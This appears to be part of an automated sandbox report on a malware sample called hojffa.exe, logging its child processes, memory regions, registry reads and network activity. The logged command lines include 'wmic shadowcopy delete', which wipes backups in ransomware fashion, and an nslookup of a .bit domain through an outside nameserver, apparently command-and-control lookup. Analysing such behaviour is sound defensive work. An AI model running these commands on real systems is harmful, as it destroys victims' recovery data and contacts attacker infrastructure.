Socket Close type = SOCK_DGRAM True 1
Fn
Process #28: nslookup.exe
10 18
»
Information Value
ID #28
File Name c:\windows\syswow64\nslookup.exe
Command Line nslookup carder.bit ns1.wowservers.ru
Initial Working Directory C:\Windows\SysWOW64\
Monitor Start Time: 00:03:15, Reason: Child Process
Unmonitor End Time: 00:05:20, Reason: Terminated by Timeout
Monitor Duration 00:02:05
OS Process Information
»
Information Value
PID 0x5e8
Parent PID 0x7cc (c:\users\aetadzjz\appdata\roaming\microsoft\hojffa.exe)
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username YKYD69Q\aETAdzjz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x 5F8
0x 608
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000030000 0x00030000 0x00036fff Pagefile Backed Memory Readable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000060000 0x00060000 0x00060fff Pagefile Backed Memory Readable True False False -
locale.nls 0x00070000 0x000d6fff Memory Mapped File Readable False False False -
pagefile_0x00000000000e0000 0x000e0000 0x000e1fff Pagefile Backed Memory Readable, Writable True False False -
nslookup.exe.mui 0x000f0000 0x000f4fff Memory Mapped File Readable, Writable False False False -
private_0x0000000000100000 0x00100000 0x00100fff Private Memory Readable, Writable True False False -
private_0x0000000000110000 0x00110000 0x00110fff Private Memory Readable, Writable True False False -
private_0x0000000000170000 0x00170000 0x001affff Private Memory Readable, Writable True False False -
private_0x0000000000210000 0x00210000 0x0024ffff Private Memory Readable, Writable True False False -
private_0x0000000000280000 0x00280000 0x002bffff Private Memory Readable, Writable True False False -
private_0x00000000002c0000 0x002c0000 0x003bffff Private Memory Readable, Writable True False False -
private_0x00000000003c0000 0x003c0000 0x003cffff Private Memory Readable, Writable True False False -
private_0x0000000000420000 0x00420000 0x0045ffff Private Memory Readable, Writable True False False -
private_0x00000000004b0000 0x004b0000 0x0052ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000530000 0x00530000 0x006b7fff Pagefile Backed Memory Readable True False False -
private_0x0000000000720000 0x00720000 0x0081ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000820000 0x00820000 0x009a0fff Pagefile Backed Memory Readable True False False -
private_0x00000000009b0000 0x009b0000 0x00b7ffff Private Memory Readable, Writable True False False -
private_0x00000000009b0000 0x009b0000 0x00b1ffff Private Memory Readable, Writable True False False -
private_0x0000000000b70000 0x00b70000 0x00b7ffff Private Memory Readable, Writable True False False -
private_0x0000000000b80000 0x00b80000 0x00bbffff Private Memory Readable, Writable True False False -
nslookup.exe 0x00ce0000 0x00cfdfff Memory Mapped File Readable, Writable, Executable True False False -
pagefile_0x0000000000d00000 0x00d00000 0x020fffff Pagefile Backed Memory Readable True False False -
sortdefault.nls 0x02100000 0x023cefff Memory Mapped File Readable False False False -
private_0x00000000023d0000 0x023d0000 0x0258ffff Private Memory Readable, Writable True False False -
wsock32.dll 0x735d0000 0x735d6fff Memory Mapped File Readable, Writable, Executable False False False -
fwpuclnt.dll 0x73600000 0x73637fff Memory Mapped File Readable, Writable, Executable False False False -
wship6.dll 0x73640000 0x73645fff Memory Mapped File Readable, Writable, Executable False False False -
wshtcpip.dll 0x73650000 0x73654fff Memory Mapped File Readable, Writable, Executable False False False -
winrnr.dll 0x73660000 0x73667fff Memory Mapped File Readable, Writable, Executable False False False -
mswsock.dll 0x73670000 0x736abfff Memory Mapped File Readable, Writable, Executable False False False -
pnrpnsp.dll 0x736b0000 0x736c1fff Memory Mapped File Readable, Writable, Executable False False False -
napinsp.dll 0x736d0000 0x736dffff Memory Mapped File Readable, Writable, Executable False False False -
rasadhlp.dll 0x73760000 0x73765fff Memory Mapped File Readable, Writable, Executable False False False -
nlaapi.dll 0x73770000 0x7377ffff Memory Mapped File Readable, Writable, Executable False False False -
winnsi.dll 0x73810000 0x73816fff Memory Mapped File Readable, Writable, Executable False False False -
iphlpapi.dll 0x73820000 0x7383bfff Memory Mapped File Readable, Writable, Executable False False False -
dnsapi.dll 0x73840000 0x73883fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x73dc0000 0x73e1bfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x73e20000 0x73e5efff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x73e70000 0x73e77fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x75200000 0x7520bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75210000 0x7526ffff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x754f0000 0x7558cfff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x75940000 0x759ebfff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x759f0000 0x75aeffff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x75cf0000 0x75cf9fff Memory Mapped File Readable, Writable, Executable False False False -
nsi.dll 0x76a50000 0x76a55fff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x76ab0000 0x76af5fff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x76b00000 0x76b8ffff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x76d90000 0x76da8fff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x76de0000 0x76e14fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x76e80000 0x76f8ffff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x76f90000 0x76feffff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x77050000 0x770effff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x770f0000 0x771bbfff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x771c0000 0x772affff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00000000772b0000 0x772b0000 0x773cefff Private Memory Readable, Writable, Executable True False False -
private_0x00000000773d0000 0x773d0000 0x774c9fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x774d0000 0x77678fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x776b0000 0x7782ffff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
Threads
Thread 0x5f8
10 18
»
Category Operation Information Success Count Logfile
System Get Time type = System Time, time = 2018-06-04 08:54:25 (UTC) True 1
Fn
System Get Time type = Ticks, time = 21481 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\nslookup.exe, base_address = 0xce0000 True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Socket Close type = SOCK_DGRAM True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = DNSLookupOrder False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = Domain True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = DhcpDomain False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DNSClient False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = SearchList True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters, value_name = DhcpSearchList False 1
Fn
DNS Get Hostname name_out = YKyd69q True 1
Fn
DNS Resolve Name host = ns1.wowservers.ru, address_out = 190.35.242.126, 197.254.118.42, 221.120.220.72, 81.4.163.122 True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Socket Connect remote_address = 190.35.242.126, remote_port = 53 False 1
Fn
Socket Send flags = NO_FLAG_SET, size = 45, size_out = 45 True 1
Fn
Data
Socket Close type = SOCK_DGRAM True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Socket Connect remote_address = 190.35.242.126, remote_port = 53 False 1
Fn
Socket Send flags = NO_FLAG_SET, size = 28, size_out = 28 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 188 True 1
Fn
Data
Socket Close type = SOCK_DGRAM True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Socket Connect remote_address = 190.35.242.126, remote_port = 53 False 1
Fn
Socket Send flags = NO_FLAG_SET, size = 28, size_out = 28 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 698 True 1
Fn
Data
Socket Close type = SOCK_DGRAM True 1
Fn
Process #29: wmic.exe
21 0
»
Information Value
ID #29
File Name c:\windows\syswow64\wbem\wmic.exe
Command Line "C:\Windows\system32\wbem\wmic.exe" shadowcopy delete
Initial Working Directory C:\Windows\SysWOW64\
Monitor Start Time: 00:03:21, Reason: Child Process
Unmonitor End Time: 00:05:20, Reason: Terminated by Timeout
Monitor Duration 00:01:59
OS Process Information
»
Information Value
PID 0x614
Parent PID 0x7cc (c:\users\aetadzjz\appdata\roaming\microsoft\hojffa.exe)
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username YKYD69Q\aETAdzjz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x 604
0x 61C
0x 618
0x 63C
0x 640
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000030000 0x00030000 0x00036fff Pagefile Backed Memory Readable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000060000 0x00060000 0x00060fff Pagefile Backed Memory Readable True False False -
locale.nls 0x00070000 0x000d6fff Memory Mapped File Readable False False False -
pagefile_0x00000000000e0000 0x000e0000 0x000e1fff Pagefile Backed Memory Readable, Writable True False False -
wmic.exe.mui 0x000f0000 0x000fffff Memory Mapped File Readable, Writable False False False -
private_0x0000000000100000 0x00100000 0x00100fff Private Memory Readable, Writable True False False -
private_0x0000000000110000 0x00110000 0x00110fff Private Memory Readable, Writable True False False -
private_0x0000000000120000 0x00120000 0x0019ffff Private Memory Readable, Writable True False False -
pagefile_0x00000000001a0000 0x001a0000 0x001a0fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000001b0000 0x001b0000 0x001b0fff Pagefile Backed Memory Readable True False False -
msxml3r.dll 0x001c0000 0x001c0fff Memory Mapped File Readable False False False -
private_0x00000000001d0000 0x001d0000 0x001effff Private Memory - True False False -
private_0x00000000001f0000 0x001f0000 0x0022ffff Private Memory Readable, Writable True False False -
private_0x0000000000230000 0x00230000 0x0026ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000270000 0x00270000 0x00271fff Pagefile Backed Memory Readable True False False -
windowsshell.manifest 0x00280000 0x00280fff Memory Mapped File Readable False False False -
pagefile_0x0000000000280000 0x00280000 0x00280fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000290000 0x00290000 0x00291fff Pagefile Backed Memory Readable True False False -
private_0x00000000002a0000 0x002a0000 0x002dffff Private Memory Readable, Writable True False False -
private_0x00000000002e0000 0x002e0000 0x0034ffff Private Memory Readable, Writable True False False -
index.dat 0x002e0000 0x002ebfff Memory Mapped File Readable, Writable True True False
index.dat 0x002f0000 0x002f7fff Memory Mapped File Readable, Writable True True False
index.dat 0x00300000 0x0030ffff Memory Mapped File Readable, Writable True True False
private_0x0000000000310000 0x00310000 0x0034ffff Private Memory Readable, Writable True False False -
rsaenh.dll 0x00350000 0x0038bfff Memory Mapped File Readable False False False -
pagefile_0x0000000000350000 0x00350000 0x0035cfff Pagefile Backed Memory Readable, Writable True False False -
wmiutils.dll.mui 0x00350000 0x00354fff Memory Mapped File Readable, Writable False False False -
private_0x0000000000390000 0x00390000 0x0048ffff Private Memory Readable, Writable True False False -
private_0x0000000000490000 0x00490000 0x004dffff Private Memory Readable, Writable True False False -
private_0x0000000000530000 0x00530000 0x0056ffff Private Memory Readable, Writable True False False -
private_0x0000000000570000 0x00570000 0x0057ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000580000 0x00580000 0x00707fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000710000 0x00710000 0x00890fff Pagefile Backed Memory Readable True False False -
wmic.exe 0x008d0000 0x00932fff Memory Mapped File Readable, Writable, Executable True False False -
pagefile_0x0000000000940000 0x00940000 0x01d3ffff Pagefile Backed Memory Readable True False False -
private_0x0000000001d50000 0x01d50000 0x01d8ffff Private Memory Readable, Writable True False False -
private_0x0000000001d90000 0x01d90000 0x01dcffff Private Memory Readable, Writable True False False -
sortdefault.nls 0x01dd0000 0x0209efff Memory Mapped File Readable False False False -
private_0x00000000020a0000 0x020a0000 0x0211ffff Private Memory Readable, Writable True False False -
private_0x0000000002120000 0x02120000 0x022cffff Private Memory Readable, Writable True False False -
kernelbase.dll.mui 0x02120000 0x021dffff Memory Mapped File Readable, Writable False False False -
private_0x00000000021e0000 0x021e0000 0x0221ffff Private Memory Readable, Writable True False False -
private_0x0000000002290000 0x02290000 0x022cffff Private Memory Readable, Writable True False False -
private_0x00000000022d0000 0x022d0000 0x0244ffff Private Memory Readable, Writable True False False -
private_0x00000000022d0000 0x022d0000 0x023cffff Private Memory Readable, Writable True False False -
private_0x0000000002410000 0x02410000 0x0244ffff Private Memory Readable, Writable True False False -
private_0x0000000002450000 0x02450000 0x0284ffff Private Memory Readable, Writable True False False -
private_0x0000000002850000 0x02850000 0x029dffff Private Memory Readable, Writable True False False -
pagefile_0x0000000002850000 0x02850000 0x0292efff Pagefile Backed Memory Readable True False False -
private_0x00000000029a0000 0x029a0000 0x029dffff Private Memory Readable, Writable True False False -
private_0x00000000029e0000 0x029e0000 0x02bcffff Private Memory Readable, Writable True False False -
private_0x0000000002a10000 0x02a10000 0x02a4ffff Private Memory Readable, Writable True False False -
private_0x0000000002a80000 0x02a80000 0x02abffff Private Memory Readable, Writable True False False -
private_0x0000000002b90000 0x02b90000 0x02bcffff Private Memory Readable, Writable True False False -
private_0x0000000002c20000 0x02c20000 0x02c5ffff Private Memory Readable, Writable True False False -
private_0x0000000002c90000 0x02c90000 0x02ccffff Private Memory Readable, Writable True False False -
wmiutils.dll 0x732d0000 0x732e6fff Memory Mapped File Readable, Writable, Executable False False False -
ntdsapi.dll 0x73300000 0x73317fff Memory Mapped File Readable, Writable, Executable False False False -
fastprox.dll 0x73320000 0x733b5fff Memory Mapped File Readable, Writable, Executable False False False -
wbemsvc.dll 0x733c0000 0x733cefff Memory Mapped File Readable, Writable, Executable False False False -
msxml3.dll 0x733d0000 0x73502fff Memory Mapped File Readable, Writable, Executable False False False -
wbemcomn.dll 0x73510000 0x7356bfff Memory Mapped File Readable, Writable, Executable False False False -
wbemprox.dll 0x73570000 0x73579fff Memory Mapped File Readable, Writable, Executable False False False -
secur32.dll 0x73580000 0x73587fff Memory Mapped File Readable, Writable, Executable False False False -
wtsapi32.dll 0x73590000 0x7359cfff Memory Mapped File Readable, Writable, Executable False False False -
framedynos.dll 0x735a0000 0x735d4fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrtremote.dll 0x736f0000 0x736fdfff Memory Mapped File Readable, Writable, Executable False False False -
winnsi.dll 0x73810000 0x73816fff Memory Mapped File Readable, Writable, Executable False False False -
iphlpapi.dll 0x73820000 0x7383bfff Memory Mapped File Readable, Writable, Executable False False False -
dnsapi.dll 0x73840000 0x73883fff Memory Mapped File Readable, Writable, Executable False False False -
rsaenh.dll 0x738b0000 0x738eafff Memory Mapped File Readable, Writable, Executable False False False -
cryptsp.dll 0x738f0000 0x73905fff Memory Mapped File Readable, Writable, Executable False False False -
profapi.dll 0x73a60000 0x73a6afff Memory Mapped File Readable, Writable, Executable False False False -
uxtheme.dll 0x73ba0000 0x73c1ffff Memory Mapped File Readable, Writable, Executable False False False -
comctl32.dll 0x73c20000 0x73dbdfff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x73dc0000 0x73e1bfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x73e20000 0x73e5efff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x73e70000 0x73e77fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x75200000 0x7520bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75210000 0x7526ffff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x75490000 0x754e6fff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x754f0000 0x7558cfff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x755a0000 0x7562efff Memory Mapped File Readable, Writable, Executable False False False -
urlmon.dll 0x75630000 0x75765fff Memory Mapped File Readable, Writable, Executable False False False -
crypt32.dll 0x75790000 0x758acfff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x75940000 0x759ebfff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x759f0000 0x75aeffff Memory Mapped File Readable, Writable, Executable False False False -
msasn1.dll 0x75af0000 0x75afbfff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x75b00000 0x75c5bfff Memory Mapped File Readable, Writable, Executable False False False -
clbcatq.dll 0x75c60000 0x75ce2fff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x75cf0000 0x75cf9fff Memory Mapped File Readable, Writable, Executable False False False -
wininet.dll 0x75d00000 0x75df4fff Memory Mapped File Readable, Writable, Executable False False False -
shell32.dll 0x75e00000 0x76a49fff Memory Mapped File Readable, Writable, Executable False False False -
nsi.dll 0x76a50000 0x76a55fff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x76ab0000 0x76af5fff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x76b00000 0x76b8ffff Memory Mapped File Readable, Writable, Executable False False False -
iertutil.dll 0x76b90000 0x76d8afff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x76d90000 0x76da8fff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x76de0000 0x76e14fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x76e80000 0x76f8ffff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x76f90000 0x76feffff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x77050000 0x770effff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x770f0000 0x771bbfff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x771c0000 0x772affff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00000000772b0000 0x772b0000 0x773cefff Private Memory Readable, Writable, Executable True False False -
private_0x00000000773d0000 0x773d0000 0x774c9fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x774d0000 0x77678fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x776b0000 0x7782ffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x000000007efaa000 0x7efaa000 0x7efacfff Private Memory Readable, Writable True False False -
private_0x000000007efad000 0x7efad000 0x7efaffff Private Memory Readable, Writable True False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efd5000 0x7efd5000 0x7efd7fff Private Memory Readable, Writable True False False -
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
Threads
Thread 0x604
21 0
»
Category Operation Information Success Count Logfile
System Get Time type = System Time, time = 2018-06-04 08:54:31 (UTC) True 1
Fn
System Get Time type = Ticks, time = 27674 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\wbem\wmic.exe, base_address = 0x8d0000 True 1
Fn
COM Create interface = DC12A687-737F-11CF-884D-00AA004B2E24, cls_context = CLSCTX_INPROC_SERVER True 1
Fn
System Get Info type = System Directory, result_out = C:\Windows\system32 True 1
Fn
Module Load module_name = C:\Windows\system32\kernel32.dll, base_address = 0x76e80000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadUILanguage, address_out = 0x76eaa84f True 1
Fn
System Get Computer Name result_out = YKYD69Q True 1
Fn
System Get Info type = System Directory, result_out = C:\Windows\system32 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM, value_name = Logging, data = 48 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM, value_name = Logging Directory True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM, value_name = Logging Directory, data = 37 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM, value_name = Log File Max Size, data = 54 True 1
Fn
COM Create interface = 2933BF95-7B36-11D2-B20E-00C04F983E60, cls_context = CLSCTX_INPROC_SERVER True 1
Fn
System Get Time type = Local Time, time = 2018-06-04 08:54:32 (Local Time) True 1
Fn
COM Create interface = EB87E1BC-3233-11D2-AEC9-00C04FB68820, cls_context = CLSCTX_INPROC_SERVER True 1
Fn
Process #33: iexplore.exe
0 0
»
Information Value
ID #33
File Name c:\program files (x86)\internet explorer\iexplore.exe
Command Line "C:\Program Files (x86)\Internet Explorer\iexplore.exe" -nohome
Initial Working Directory C:\Windows\SysWOW64\
Monitor Start Time: 00:03:24, Reason: Child Process
Unmonitor End Time: 00:05:20, Reason: Terminated by Timeout
Monitor Duration 00:01:56
Remarks No high level activity detected in monitored regions
OS Process Information
»
Information Value
PID 0x690
Parent PID 0x7cc (c:\users\aetadzjz\appdata\roaming\microsoft\hojffa.exe)
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username YKYD69Q\aETAdzjz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x 69C
0x 6A0
0x 6C8
0x 270
0x 720
0x 728
0x 734
0x 740
0x 724
0x 7D0
0x 4E8
0x 450
0x 53C
0x 540
0x 7C4
0x 7B0
0x 7AC
0x 3B8
0x 320
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000020000 0x00020000 0x0002ffff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000030000 0x00030000 0x00036fff Pagefile Backed Memory Readable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False -
locale.nls 0x00060000 0x000c6fff Memory Mapped File Readable False False False -
pagefile_0x00000000000d0000 0x000d0000 0x000d1fff Pagefile Backed Memory Readable, Writable True False False -
iexplore.exe.mui 0x000e0000 0x000e1fff Memory Mapped File Readable, Writable False False False -
private_0x00000000000f0000 0x000f0000 0x000f0fff Private Memory Readable, Writable True False False -
private_0x0000000000100000 0x00100000 0x00100fff Private Memory Readable, Writable True False False -
oleaccrc.dll 0x00110000 0x00110fff Memory Mapped File Readable False False False -
pagefile_0x0000000000120000 0x00120000 0x00121fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000130000 0x00130000 0x00131fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000140000 0x00140000 0x00141fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000150000 0x00150000 0x00150fff Pagefile Backed Memory Readable, Writable True False False -
index.dat 0x00160000 0x0016bfff Memory Mapped File Readable, Writable True True False
index.dat 0x00160000 0x0016ffff Memory Mapped File Readable, Writable True True False
index.dat 0x00170000 0x00177fff Memory Mapped File Readable, Writable True True False
index.dat 0x00180000 0x0018ffff Memory Mapped File Readable, Writable True True False
pagefile_0x0000000000190000 0x00190000 0x00190fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000001a0000 0x001a0000 0x001a0fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000001b0000 0x001b0000 0x001b0fff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000000001c0000 0x001c0000 0x001c0fff Private Memory Readable, Writable True False False -
private_0x00000000001d0000 0x001d0000 0x001d0fff Private Memory Readable, Writable True False False -
pagefile_0x00000000001e0000 0x001e0000 0x001e1fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x00000000001f0000 0x001f0000 0x001f1fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000200000 0x00200000 0x00200fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000210000 0x00210000 0x0024ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000250000 0x00250000 0x00250fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000260000 0x00260000 0x0029ffff Private Memory Readable, Writable True False False -
pagefile_0x00000000002a0000 0x002a0000 0x002a0fff Pagefile Backed Memory Readable True False False -
private_0x00000000002b0000 0x002b0000 0x002cffff Private Memory Readable, Writable True False False -
private_0x00000000002e0000 0x002e0000 0x003dffff Private Memory Readable, Writable True False False -
private_0x00000000003e0000 0x003e0000 0x004dffff Private Memory Readable, Writable True False False -
private_0x00000000004f0000 0x004f0000 0x0052ffff Private Memory Readable, Writable True False False -
private_0x0000000000560000 0x00560000 0x005dffff Private Memory Readable, Writable True False False -
private_0x0000000000600000 0x00600000 0x0063ffff Private Memory Readable, Writable True False False -
private_0x0000000000640000 0x00640000 0x0067ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000680000 0x00680000 0x0075efff Pagefile Backed Memory Readable True False False -
private_0x0000000000760000 0x00760000 0x0085ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000860000 0x00860000 0x009e7fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000009f0000 0x009f0000 0x00b70fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000b80000 0x00b80000 0x00bedfff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000bf0000 0x00bf0000 0x00c4cfff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000c50000 0x00c50000 0x00c8ffff Private Memory Readable, Writable True False False -
private_0x0000000000cf0000 0x00cf0000 0x00cfffff Private Memory Readable, Writable True False False -
private_0x0000000000d00000 0x00d00000 0x00d3ffff Private Memory Readable, Writable True False False -
iexplore.exe 0x00d50000 0x00df5fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000000e00000 0x00e00000 0x021fffff Pagefile Backed Memory Readable True False False -
sortdefault.nls 0x02200000 0x024cefff Memory Mapped File Readable False False False -
